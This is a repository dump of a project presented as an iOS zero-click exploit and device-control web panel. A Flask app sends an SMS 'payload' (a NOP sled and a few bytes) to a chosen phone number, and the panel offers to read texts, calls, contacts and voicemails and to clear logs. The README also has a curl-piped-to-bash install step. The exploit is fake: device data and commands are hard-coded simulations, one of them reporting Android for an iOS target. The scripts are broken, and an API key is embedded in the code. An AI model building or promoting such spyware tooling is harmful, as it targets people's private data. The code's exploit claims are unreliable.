├── requirements.txt ├── launch_web_panel.sh ├── setup.sh ├── .github └── FUNDING.yml ├── LICENSE ├── README.md ├── initialize_repo.sh ├── install.sh ├── app.py └── index.html /requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.2.5 2 | requests==2.32.2 3 | gunicorn==22.0.0 4 | -------------------------------------------------------------------------------- /launch_web_panel.sh: -------------------------------------------------------------------------------- 1 | echo '#!/bin/bash' > launch_web_panel.sh 2 | echo 'python app.py &' >> launch_web_panel.sh 3 | echo 'sleep 2' >> launch_web_panel.sh 4 | echo 'xdg-open http://127.0.0.1:5000' >> launch_web_panel.sh 5 | chmod +x launch_web_panel.sh 6 | bash launch_web_panel.sh 7 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | from setuptools import setup, find_packages 2 | 3 | setup( 4 | name='ios_zero_click_exploit', 5 | version='1.0.0', 6 | packages=find_packages(), 7 | include_package_data=True, 8 | install_requires=[ 9 | 'Flask==2.0.1', 10 | 'requests==2.25.1', 11 | 'gunicorn==20.1.0', 12 | ], 13 | entry_points={ 14 | 'console_scripts': [ 15 | 'runserver=ios_zero_click_exploit.app:main', 16 | ], 17 | }, 18 | ) 19 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry 12 | polar: # Replace with a single Polar username 13 | buy_me_a_coffee: # Replace with a single Buy Me a Coffee username 14 | thanks_dev: # Replace with a single thanks.dev username 15 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 16 | 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 PROJECT ZERO 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # This Framework Is Designed To Operate Within A Web App That Handles Zero-Click Exploit Generation, Exploit Deployment & Post Exploitation (Device Control) of iOS Devices. 2 | 3 | This project provides a web interface to send a payload via SMS, display device information upon successful delivery, and control the device using various commands. 4 | 5 | ## Features 6 | 7 | ### Send payload via SMS 8 | ### Display device information 9 | ### Control device: 10 | • reboot 11 | • shutdown 12 | • send text 13 | • make call 14 | • view call log 15 | • view text messages 16 | • listen to voicemails 17 | • view installed apps 18 | • view app usage 19 | • view contacts 20 | • download SMS messages 21 | • download call log 22 | • download contacts 23 | • download app list 24 | • download phone usage 25 | • view processes 26 | • access device console 27 | • clear logs 28 | 29 | ## Prerequisites 30 | 31 | ### • Python 3.x 32 | ### • Flask 33 | ### • requests 34 | ### • sqlite3 35 | 36 | ## Installation 37 | ### 1. Run the installation script: 38 | 39 | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/ProjectZeroDays/iOS-Zero-Click-Exploit-Deploy-And-Control-Web-Panel/Your-Momma-Beeotch/install.sh?token=GHSAT0AAAAAACXPDPX4DNMUTRB2MFJREUAQZXEQVIA)" 40 | 41 | ### After: 42 | 43 | Open index.html in a web browser. 44 | 45 | Use the form to input a phone number and send the payload. 46 | 47 | Upon successful delivery, the web panel will auto-populate with the device information and provide control options for various commands. 48 | 49 | ### API Key for Free Text Service 50 | 51 | * You can get the API key for the free text service from Textbelt. 52 | * Replace 'textbelt' in the send_sms function with your actual API key. 53 | 54 | License: 55 | * This project is licensed under the MIT License 56 | -------------------------------------------------------------------------------- /initialize_repo.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Variables 4 | REPO_URL="https://github.com/ProjectZeroDays/iOS-Zero-Click-Exploit-Deploy-And-Control-Web-Panel.git" 5 | REPO_NAME="iOS-Zero-Click-Exploit-Deploy-And-Control-Web-Panel" 6 | BRANCH_NAME="main" 7 | 8 | # Clone the repository 9 | git clone $REPO_URL 10 | cd $REPO_NAME 11 | 12 | # Create requirements.txt 13 | cat < requirements.txt 14 | Flask==2.0.1 15 | requests==2.25.1 16 | gunicorn==20.1.0 17 | EOL 18 | 19 | # Create setup.py 20 | cat < setup.py 21 | from setuptools import setup, find_packages 22 | 23 | setup( 24 | name='ios_zero_click_exploit', 25 | version='1.0.0', 26 | packages=find_packages(), 27 | include_package_data=True, 28 | install_requires=[ 29 | 'Flask==2.0.1', 30 | 'requests==2.25.1', 31 | 'gunicorn==20.1.0', 32 | ], 33 | entry_points={ 34 | 'console_scripts': [ 35 | 'runserver=ios_zero_click_exploit.app:main', 36 | ], 37 | }, 38 | ) 39 | EOL 40 | 41 | # Create GitHub Actions Workflow 42 | mkdir -p .github/workflows 43 | cat < .github/workflows/deploy.yml 44 | name: Deploy 45 | 46 | on: 47 | push: 48 | branches: 49 | - main 50 | 51 | jobs: 52 | build: 53 | runs-on: ubuntu-latest 54 | 55 | steps: 56 | - name: Checkout code 57 | uses: actions/checkout@v2 58 | 59 | - name: Set up Python 60 | uses: actions/setup-python@v2 61 | with: 62 | python-version: '3.8' 63 | 64 | - name: Install dependencies 65 | run: | 66 | python -m pip install --upgrade pip 67 | pip install -r requirements.txt 68 | 69 | - name: Run tests 70 | run: | 71 | # Add your test command here 72 | echo "Running tests" 73 | 74 | - name: Deploy to production 75 | run: | 76 | # Add your deployment command here 77 | echo "Deploying" 78 | if: github.ref == 'refs/heads/main' 79 | EOL 80 | 81 | # Commit and push the changes 82 | git add requirements.txt setup.py .github/workflows/deploy.yml 83 | git commit -m "Add requirements.txt, setup.py, and GitHub Actions workflow" 84 | git push origin $BRANCH_NAME 85 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Create the install.sh file 4 | echo '#!/bin/bash' > install.sh 5 | echo 'pip install Flask requests sqlite3' >> install.sh 6 | echo '# Function to install packages on Linux or macOS using Homebrew' >> install.sh 7 | echo 'install_brew() {' >> install.sh 8 | echo ' brew install git python3 curl' >> install.sh 9 | echo '}' >> install.sh 10 | echo ' ' >> install.sh 11 | echo '# Function to install packages on Windows using the best available package manager' >> install.sh 12 | echo 'install_windows() {' >> install.sh 13 | echo ' if command -v winget &> /dev/null; then' >> install.sh 14 | echo ' winget install --id Git.Git -e --source winget' >> install.sh 15 | echo ' winget install --id Python.Python.3 -e --source winget' >> install.sh 16 | echo ' winget install --id curl.curl -e --source winget' >> install.sh 17 | echo ' elif command -v choco &> /dev/null; then' >> install.sh 18 | echo ' choco install git' >> install.sh 19 | echo ' choco install python' >> install.sh 20 | echo ' choco install curl' >> install.sh 21 | echo ' elif command -v scoop &> /dev/null; then' >> install.sh 22 | echo ' scoop install git' >> install.sh 23 | echo ' scoop install python' >> install.sh 24 | echo ' scoop install curl' >> install.sh 25 | echo ' elif command -v nuget &> /dev/null; then' >> install.sh 26 | echo ' nuget install git' >> install.sh 27 | echo ' nuget install python' >> install.sh 28 | echo ' nuget install curl' >> install.sh 29 | echo ' else' >> install.sh 30 | echo ' echo "No suitable package manager found on Windows."' >> install.sh 31 | echo ' exit 1' >> install.sh 32 | echo ' fi' >> install.sh 33 | echo '}' >> install.sh 34 | echo ' ' >> install.sh 35 | echo '# Detect the operating system' >> install.sh 36 | echo 'OS="$(uname -s)"' >> install.sh 37 | echo 'case "$OS" in' >> install.sh 38 | echo ' Linux*) install_brew ;;' >> install.sh 39 | echo ' Darwin*) install_brew ;;' >> install.sh 40 | echo ' CYGWIN*|MINGW*|MSYS*) install_windows ;;' >> install.sh 41 | echo ' *) echo "Unsupported OS: $OS" ;;' >> install.sh 42 | echo 'esac' >> install.sh 43 | echo 'git clone https://github.com/ProjectZeroDays/iOS-Zero-Click-Exploit-Deploy-And-Control-Web-Panel' >> install.sh 44 | echo 'cd iOS-Zero-Click-Exploit-Deploy-And-Control-Web-Panel' >> install.sh 45 | echo 'chmod +x install.sh' >> install.sh 46 | echo 'sh install.sh' >> install.sh 47 | echo 'sh launch_web_panel.sh' >> install.sh 48 | 49 | # Run the created install.sh file 50 | bash install.sh 51 | -------------------------------------------------------------------------------- /app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, jsonify 2 | import requests 3 | import sqlite3 4 | 5 | app = Flask(__name__) 6 | 7 | def send_sms(to_phone_number, message): 8 | url = 'https://textbelt.com/text' 9 | data = { 10 | 'phone': to_phone_number, 11 | 'message': message, 12 | 'key': '6c6ba6cbbed7e162c975b3d2f8b0b391f8c5f97aQeDibGwKd8KbMQiMV1DSuUkaW' 13 | } 14 | try: 15 | response = requests.post(url, data=data) 16 | response.raise_for_status() 17 | return response.json() 18 | except requests.RequestException as e: 19 | return {'success': False, 'message': str(e)} 20 | 21 | def store_device_info(device_info): 22 | conn = sqlite3.connect('device_info.db') 23 | c = conn.cursor() 24 | c.execute('''CREATE TABLE IF NOT EXISTS devices 25 | (ip TEXT, os TEXT, location TEXT)''') 26 | c.execute("INSERT INTO devices (ip, os, location) VALUES (?, ?, ?)", 27 | (device_info['ip'], device_info['os'], device_info['location'])) 28 | conn.commit() 29 | conn.close() 30 | 31 | @app.route('/send_sms', methods=['POST']) 32 | def send_sms_route(): 33 | data = request.get_json() 34 | phone_number = data.get('phoneNumber') 35 | payload = b"\x90" * 512 + b"\x31\xDB\x53\x43\x41\x50\x54" 36 | message = payload.decode('latin1') 37 | result = send_sms(phone_number, message) 38 | if result.get('success'): 39 | return jsonify({'message': 'Payload sent successfully!', 'success': True}) 40 | else: 41 | return jsonify({'message': 'Failed to send payload.', 'success': False}) 42 | 43 | @app.route('/get_device_info', methods=['POST']) 44 | def get_device_info(): 45 | data = request.get_json() 46 | phone_number = data.get('phoneNumber') 47 | # Simulate fetching device information 48 | device_info = { 49 | 'ip': '192.168.0.100', 50 | 'os': 'Android 10', 51 | 'location': 'Boone, NC, USA' 52 | } 53 | store_device_info(device_info) 54 | return jsonify(device_info) 55 | 56 | @app.route('/send_command', methods=['POST']) 57 | def send_command(): 58 | data = request.get_json() 59 | phone_number = data.get('phoneNumber') 60 | command = data.get('command') 61 | # Simulate sending a command to the device 62 | command_responses = { 63 | 'reboot': 'Device is rebooting...', 64 | 'shutdown': 'Device is shutting down...', 65 | 'get_info': 'Fetching device info...', 66 | 'send_text': 'Sending text message...', 67 | 'make_call': 'Making a call...', 68 | 'view_call_log': 'Viewing call log...', 69 | 'view_text_messages': 'Viewing text messages...', 70 | 'listen_voicemails': 'Listening to voicemails...', 71 | 'view_installed_apps': 'Viewing installed apps...', 72 | 'view_app_usage': 'Viewing app usage...', 73 | 'view_contacts': 'Viewing contacts...', 74 | 'download_sms': 'Downloading SMS messages...', 75 | 'download_call_log': 'Downloading call log...', 76 | 'download_contacts': 'Downloading contacts...', 77 | 'download_app_list': 'Downloading app list...', 78 | 'download_phone_usage': 'Downloading phone usage...', 79 | 'view_processes': 'Viewing processes...', 80 | 'device_console': 'Accessing device console...', 81 | 'clear_logs': 'Clearing logs...' 82 | } 83 | message = command_responses.get(command, 'Unknown command.') 84 | return jsonify({'message': message}) 85 | 86 | if __name__ == '__main__': 87 | app.run(debug=True) 88 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | SMS Payload Sender 7 | 8 | 9 | 35 | 36 | 37 |
38 |

Send Payload via SMS

39 |
40 |
41 | 42 | 43 |
44 | 45 |
46 |
47 |
48 |

Device Information

49 |

IP Address:

50 |

OS:

51 |

Location:

52 |
53 |
54 |

Control Panel

55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 |
75 |
76 | 77 | 78 | 79 | 80 | 81 | 82 | 135 | 136 | 137 | --------------------------------------------------------------------------------